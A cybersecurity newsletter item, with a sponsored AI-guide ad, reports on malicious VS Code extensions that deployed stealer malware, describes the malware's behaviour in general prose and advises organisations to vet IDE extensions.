In partnership with
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
Learn how to make every AI investment count.
Successful AI transformation starts with deeply understanding your organization’s most critical use cases. We recommend this practical guide from You.com that walks through a proven framework to identify, prioritize, and document high-value AI opportunities.
In this AI Use Case Discovery Guide, you’ll learn how to:
Map internal workflows and customer journeys to pinpoint where AI can drive measurable ROI
Ask the right questions when it comes to AI use cases
Align cross-functional teams and stakeholders for a unified, scalable approach
Malicious VS Code Extensions Steal Developer Data
Two malicious Visual Studio Code (VS Code) extensions were discovered on Microsoft’s official marketplace, posing as a dark theme and an AI coding assistant. Instead of improving the developer experience, these extensions deployed stealer malware capable of exfiltrating credentials, browser sessions, system details, and even live screenshots. The incident highlights the expanding supply-chain risk present in developer tooling ecosystems.
Context
VS Code’s marketplace is widely trusted by developers, and malicious extensions can easily blend into legitimate offerings. With AI assistants and theme packages rapidly proliferating, attackers are increasingly leveraging these vectors to infiltrate development environments — environments that often contain source code, secrets, API keys, and access tokens.
What Happened
Security researchers at Koi Security identified two extensions — BigBlack.bitcoin-black and BigBlack.codo-ai — that secretly deployed stealer malware. A third related package was also removed by Microsoft.
All three extensions were created by the same publisher and were downloaded by dozens of users before being taken down between December 5–8, 2025.
Technical Breakdown
The extensions contained hidden code that:
Downloaded additional payloads from an attacker-controlled domain
Executed PowerShell and batch scripts silently
Side-loaded a malicious DLL via Lightshot executable hijacking
Captured screenshots, clipboard contents, and system details
Extracted stored WiFi credentials
Enumerated installed apps and running processes
Launched Chrome and Edge in headless mode to steal cookies and active sessions
Sent all captured data to a remote server
Early versions exposed a visible PowerShell window but were later refined to execute fully covertly.
Beyond VS Code, Socket researchers also identified malicious packages in Go, npm, and Rust ecosystems — all designed to steal credentials or act as loaders for further payloads.
Impact Analysis
Developer environments are high-value targets. Malware executed in a development context can:
Compromise source code repositories
Steal API keys, SSH keys, or CI/CD tokens
Hijack software supply chains
Exfiltrate sensitive corporate data
Facilitate persistent access into enterprise systems
Even extensions with few installations can have outsized impact if they target developers within organizations or open-source maintainers.
Why It Matters
This incident underscores a growing threat trend: malicious developer tooling. Attackers are shifting from phishing to supply-chain infiltration by compromising the tools developers use daily. With AI agents and automated workflows integrated into IDEs, malicious extensions can quietly operate without user suspicion.
Expert Commentary
“Your code. Your emails. Your Slack DMs… Whatever’s on your screen, they’re seeing it too,” said Idan Dardikman of Koi Security.
Socket researcher Kush Pandya warned that attackers increasingly hide malicious behavior inside legitimate-looking open-source components, making detection significantly harder.
Key Takeaways
Malicious VS Code extensions deployed stealer malware to developer machines.
Attackers used DLL hijacking, headless browsers, and automated data exfiltration.
Similar malicious packages were found across Go, npm, and Rust ecosystems.
Developer environments remain a prime target for supply-chain compromise.
Organizations must treat IDE extensions as critical components requiring vetting and monitoring.